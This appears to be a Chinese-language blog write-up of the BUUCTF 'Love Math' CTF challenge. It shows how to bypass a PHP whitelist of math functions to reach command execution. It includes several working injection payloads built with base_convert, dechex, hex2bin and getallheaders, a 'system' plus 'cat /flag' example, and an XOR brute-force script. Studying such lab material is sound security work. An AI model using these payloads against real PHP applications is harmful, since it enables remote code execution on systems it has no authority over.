buuctf:[CISCN 2019 初赛] Love Math-总结数学中的命令执行

分析

  • 开局给了源码 拿到本地分析一下
    1.png

2.png

3.png

白名单只给了一堆数学函数

$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];

从里面找出来能够利用的拼凑出命令执行

最终肯定希望能够达成这样的结果eval('echo' . '$_POST[1]' . ';')
所以难点在于如何利用已知函数来拼凑出$_POST

几个函数

  1. hex2bin — 转换十六进制字符串为二进制字符串
  2. base_convert — 在任意进制之间转换数字,最高为36进制
  3. dechex — 十进制转换为十六进制

利用base_convert凑出来hex2bin,再利用hex2bin凑出来_POST,最后用可变变量完成命令执行

payload

?c=$pi=base_convert(37907361743,10,36)(dechex(409369269076));$$pi{1}($$pi{2})

c=$pi=base_convert(37907361743,10,36); // base_convert(37907361743,10,36) = hex2bin
dechex(409369269076); // 转成_POST字符串的十六进制

以上两个语句合起来为 $pi = hex2bin('5f504f5354') = _POST;

$$pi{1}($$pi{2}) = $_POST{1}($_POST{2}); // 中括号被ban,用大括号来绕过

4.png

其他payload

get传入参数命令执行

?c=$abs=base_convert(37907361743,10,36)(dechex(1598506324));$$abs{pi}($$abs{sin})&pi=system&sin=cat /flag

$abs=base_convert(37907361743,10,36)(dechex(1598506324)) = _GET;

$$abs{pi}($$abs{sin} = $_GET{pi}($_GET{sin}); // 通过get方法传入参数完成命令执行

headers传入参数命令执行

c=$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1})

$pi(696468,10,36) = base_convert(696468,10,36) = exec
(($pi(8768397090111664438,10,30))(){1}) = ((base_convert(8768397090111664438,10,30))(){1}) = getallheaders(){1}

即 exec(getallheaders(){1})

几点说明

getallheaders — 获取全部 HTTP 请求头信息

5.png

当取数组元素时,用大括号会抛出警告而不是错误

6.png

用上述payload 加上 postman改下headers即可命令执行getflag

9.png

字符串异或命令执行

<?php
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];

foreach($whitelist as $white){
for($i = 0;$i < 999999; $i++){
if(preg_match("/^_POST$/",$white ^ decbin($i),$mach)){
echo "decbin:" . $i . ' : ' . $white . ' : ' . "\n";
print_r($mach);
echo "\n";
}
if(preg_match("/^_POST$/",$white ^ decoct($i),$mach)){
echo "decoct:" . $i . ' : ' . $white . ' : ' . "\n";
print_r($mach);
echo "\n";
}
if(preg_match("/^_POST$/",$white ^ dechex($i),$mach)){
echo "dechex:" . $i . ' : ' . $white . ' : ' . "\n";
print_r($mach);
echo "\n";
}
}
}
>

7.png

发现俩能用的

payload:?c=$pi=dechex(481137)^hexdec;$$pi{1}($$pi{2})

8.png

Reference

https://www.cnblogs.com/wangtanzhi/p/12246731.html
https://www.bilibili.com/video/BV1pE411f7DN?t=1567

文章作者: Alex
文章链接: http://example.com/2021/03/06/web1-love-math/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alex's blog~